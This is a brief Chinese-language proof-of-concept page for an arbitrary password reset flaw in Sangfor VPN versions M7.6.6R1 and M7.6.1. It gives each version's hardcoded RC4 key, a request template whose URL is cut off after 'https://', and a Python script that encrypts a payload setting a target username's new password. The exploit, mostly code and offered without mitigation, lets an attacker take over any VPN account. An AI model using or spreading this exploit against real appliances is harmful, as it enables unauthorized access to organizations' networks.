深信服VPN任意密码重置
漏洞范围¶
已知M7.6.6R1 M7.6.1 其他版本有待测试
漏洞POC¶
M7.6.6R1 key 为 20181118 M7.6.1 key 为 20100720``` https://
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN `````` 计算RC4_STR_LEN脚本 from Crypto.Cipher import ARC4 from binascii import a2b_hex
def myRC4(data,key): rc41 = ARC4.new(key) encrypted = rc41.encrypt(data) return encrypted.encode('hex')
def rc4_decrpt_hex(data,key): rc41 = ARC4.new(key) return rc41.decrypt(a2b_hex(data)) key = '20100720' data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,' print myRC4(data, key) ```